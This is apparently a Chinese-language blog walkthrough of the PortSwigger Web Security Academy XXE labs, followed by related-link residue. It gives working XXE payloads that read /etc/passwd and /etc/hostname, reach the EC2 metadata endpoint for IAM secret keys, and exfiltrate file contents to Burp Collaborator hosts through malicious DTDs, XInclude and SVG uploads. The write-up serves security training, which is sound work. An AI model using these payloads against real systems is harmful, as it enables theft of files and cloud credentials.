Portswigger web security academy:XML external entity (XXE) injection

1 - Exploiting XXE using external entities to retrieve files

  • 题目描述

    • Check stock功能点可能存在XXE
  • 要求

    • 读取/etc/passwd
  • 解题过程

    • 构造读取文件的exp

      • <?xml version="1.0" encoding="UTF-8"?>
        <!DOCTYPE xxe [ <!ENTITY ext SYSTEM "file:///etc/passwd" > ]>
        <stockCheck><productId>1&ext;</productId><storeId>1</storeId></stockCheck>

2 - Exploiting XXE to perform SSRF attacks

  • 题目描述

    • Check stock功能点可以XXE
    • 169.254.169.254存在EC2元数据端点
  • 要求

    • 利用XXE进行SSRF,获取EC2中的IAM secret access key
  • 解题步骤

    • 构造exp

      • <?xml version="1.0" encoding="UTF-8"?>
        <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>
        <stockCheck><productId>&xxe;</productId><storeId>1&xxe;</storeId></stockCheck>
      • 这里需要把实体放在productId中,因为该参数出错后会把输入的内容返回

      • 请求会返回目录,根据返回的目录逐层进入即可

3 - Blind XXE with out-of-band interaction

  • 题目描述

    • Check stock存在XXE
    • 但是没有返回
  • 要求

    • 实现OOB(Out-Of-Band 外带) XXE
  • 解题过程

    • 利用burp自带的Collaborator构造exp

    • <?xml version="1.0" encoding="UTF-8"?>
      <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://zrusv2avyq5v1n31ir5cestoefk58u.burpcollaborator.net/"> ]>
      <stockCheck><productId>&xxe;</productId><storeId>1&xxe;</storeId></stockCheck>

4 - Blind XXE with out-of-band interaction via XML parameter entities

  • 题目描述

    • Check stock存在XXE
    • 会阻止包含常规外部实体的请求
  • 要求

    • 实现OOB XXE
  • 解题过程

    • 从材料中得知,除了普通的外部实体,还有参数实体

    • 借助参数实体构造exp

      • <?xml version="1.0" encoding="UTF-8"?>
        <!DOCTYPE asd [ <!ENTITY % xxe SYSTEM "http://qwqj0tfm3ham6e8snia3jjyfj6pxdm.burpcollaborator.net"> %xxe; ]>
        <stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>

5 - Exploiting blind XXE to exfiltrate data using a malicious external DTD

  • 题目描述

    • Check stock存在XXE
  • 要求

    • 获取/etc/hostname的内容
  • 解题步骤

    • 借助collaborator构造参数实体exp并上传到exploirt server

      • <!ENTITY % file SYSTEM "file:///etc/hostname">
        <!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://y98rd1sugpnujml00qnbwrbnwe26qv.burpcollaborator.net/?%file;'>">
        %eval;
        %exfiltrate;
      • 其中的&#x25%的十六进制下的实体编码,用实体编码是为了防止报错

      • %eval会解码并执行<!ENTITY % exfiltrate SYSTEM 'http://y98rd1sugpnujml00qnbwrbnwe26qv.burpcollaborator.net/?%file;'>,即进行参数实体exfiltrate的定义声明

    • 构造xxe加载exp

      • <!DOCTYPE asd [<!ENTITY % ext SYSTEM "https://ac8f1f291f206d6880971508018f00ac.web-security-academy.net/exploit"> %ext;]
    • 在collaborator client查看请求,复制并提交hostname

6 - Exploiting blind XXE to retrieve data via error messages

  • 题目描述

    • Check stock存在XXE
    • exploit server可以放置恶意DTD
  • 要求

    • 通过报错信息获取/etc/passwd的内容
  • 解题步骤

    • 和上一题类似,先构造参数实体exp并上传到exploit server

      • <!ENTITY % file SYSTEM "file:///etc/passwd">
        <!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">%eval;%error;
    • 构造xxe加载exp

      • <!DOCTYPE asd [<!ENTITY % ext SYSTEM "https://ace71f7f1e8ca62780ce1c5f01dd00a4.web-security-academy.net/exploit"> %ext;]>

7 -Exploiting XXE to retrieve data by repurposing a local DTD

  • 题目描述

    • Check stock存在XXE
    • 主机存在DTD文件/usr/share/yelp/dtd/docbookx.dtd,且其中有一个实体叫做ISOamso
  • 要求

  • 解题步骤

    • 材料已经写的很详细了,直接构造exp

      • <!DOCTYPE foo [
        <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
        <!ENTITY % ISOamso '
        <!ENTITY % file SYSTEM "file:///etc/passwd">
        <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
        %eval;
        %error;
        '>
        %local_dtd;
        ]>
      • 这个exp解决了当主机无法加载外网DTD文件时如何进行报错XXE的问题

      • 巧妙之处在于,直接提交的XML:一个内部实体中不能包含另一个实体,但是通过加载并重定义本地DTD文件中的实体,可以解决这个问题

8 - Exploiting XInclude to retrieve files

  • 题目描述

    • Check stock存在XXE,用户输入会被嵌入服务端的XML中并随后被解析
  • 要求

    • 借助XInclude语句获取/etc/passwd文件内容
  • 解题步骤

    • 关于XInclude可以看看这篇文章

    • 简而言之,它的作用和php的include类似,把目标文件的内容包含进来

    • 构造exp

      • productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude">
        <xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1

9 - Exploiting XXE via image file upload

  • 题目描述

    • 这个lab允许用户上传图片
    • 服务端使用Apache Batik library处理上传的图片
  • 要求

    • 通过XXE获取/etc/hostname的内容并提交
  • 解题步骤

    • 尝试构造exp

      • <?xml version="1.0" standalone="yes"?>
        <!DOCTYPE asd [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
        <svg><xxx>&xxe;</xxx></svg>
      • 报错500,然后尝试了很多其他格式和命名方式,都不行,去看了官方的solution。。。发现需要用svg的标准来写,因为最后内容会被转换为png

      • <?xml version="1.0" standalone="yes"?>
        <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
        <svg xmlns="http://www.w3.org/2000/svg" version="1.1">
        <text font-size="16" x="0" y="16">&xxe;</text>
        </svg>

Portswigger web security academy:XML external entity (XXE) injection的更多相关文章

  1. Portswigger web security academy:SQL injection

    Portswigger web security academy:SQL injection 目录 Portswigger web security academy:SQL injection SQL ...

  2. Portswigger web security academy:Cross-site request forgery (CSRF)

    Portswigger web security academy:Cross-site request forgery (CSRF) 目录 Portswigger web security acade ...

  3. Portswigger web security academy:WebSockets

    Portswigger web security academy:WebSockets 目录 Portswigger web security academy:WebSockets Lab: Mani ...

  4. Portswigger web security academy:Clickjacking (UI redressing)

    Portswigger web security academy:Clickjacking (UI redressing) 目录 Portswigger web security academy:Cl ...

  5. Portswigger web security academy:Cross-origin resource sharing (CORS)

    Portswigger web security academy:Cross-origin resource sharing (CORS) 目录 Portswigger web security ac ...

  6. Portswigger web security academy:OAth authentication vulnerable

    Portswigger web security academy:OAth authentication vulnerable 目录 Portswigger web security academy: ...

  7. Portswigger web security academy:Server-side request forgery (SSRF)

    Portswigger web security academy:Server-side request forgery (SSRF) 目录 Portswigger web security acad ...

  8. Portswigger web security academy:OS command injection

    Portswigger web security academy:OS command injection 目录 Portswigger web security academy:OS command ...

  9. Portswigger web security academy:Server-side template injection(SSTI)

    Portswigger web security academy:Server-side template injection(SSTI) 目录 Portswigger web security ac ...

随机推荐

  1. uwsgi+nginx+virtualenv+supervisor

    一.linux安装Python 1.依赖 `yum install gcc patch libffi-devel python-devel zlib-devel bzip2-devel openssl ...

  2. weblogic之cve-2015-4852分析(重写)

    前言 有时间打算分析weblogic历史漏洞,但是又要面试啥的,没空.又刚好最近面试会问weblogic反序列化.具体啥时候分析weblogic反序列化,可能会在护网后,或者我开学了再分析.期间可能我 ...

  3. 深入理解Java并发框架AQS系列(二):AQS框架简介及锁概念

    深入理解Java并发框架AQS系列(一):线程 深入理解Java并发框架AQS系列(二):AQS框架简介及锁概念 一.AQS框架简介 AQS诞生于Jdk1.5,在当时低效且功能单一的synchroni ...

  4. python 常用的库

    本节大纲: 模块介绍 time &datetime模块 random os sys shutil json & picle shelve xml处理 yaml处理 configpars ...

  5. Java并发编程之锁机制

    锁分类 悲观锁与乐观锁 悲观锁认为对于同一个数据的并发操作,一定是会发生修改的,哪怕没有修改,也会认为修改.因此对于同一个数据的并发操作,悲观锁采取加锁的形式.悲观的认为,不加锁的并发操作一定会出问题 ...

  6. c++ 反汇编 循环结构

    debug do···while 23: int nSum = 0; 00A572AE C7 45 F8 00 00 00 00 mov dword ptr [nSum],0 24: int nInd ...

  7. [系统重装日志1]快速迁移/恢复Mendeley的文献和笔记

    一时手贱把原先系统的EFI分区给删了,按照网上的教程还没有恢复成功,无奈之下只能重装系统,想想这么多环境和配置真是酸爽. 身为一个伪科研工作者,首先想到的是自己的文献和阅读笔记.我所使用的文献管理工具 ...

  8. 系统编程-信号-总体概述和signal基本使用

    信号章节 -- 信号章节总体概要 信号基本概念 信号是异步事件,发送信号的线程可以继续向下执行而不阻塞. 信号无优先级. 1到31号信号是非实时信号,发送的信号可能会丢失,不支持信号排队. 31号信号 ...

  9. C++并发与多线程学习笔记--多线程数据共享问题

    创建和等待多个线程 数据和共享问题分析 只读的数据 有读有写 其他案例 共享数据的保护案例代码 创建和等待多个线程 服务端后台开发就需要多个线程执行不同的任务.不同的线程执行不同任务,并返回执行结果. ...

  10. [Fundamental of Power Electronics]-PART I-5.不连续导电模式-5.1 DCM来源和模式边界

    引子: 当使用电流单向和/或电压单向半导体开关实现DC-DC变换器的理想开关时,可能会出现一种或多种被称为不连续导电模式(DCM)的新工作模式.当电感电流或电容电压的纹波大到足以导致所施加的开关电流或 ...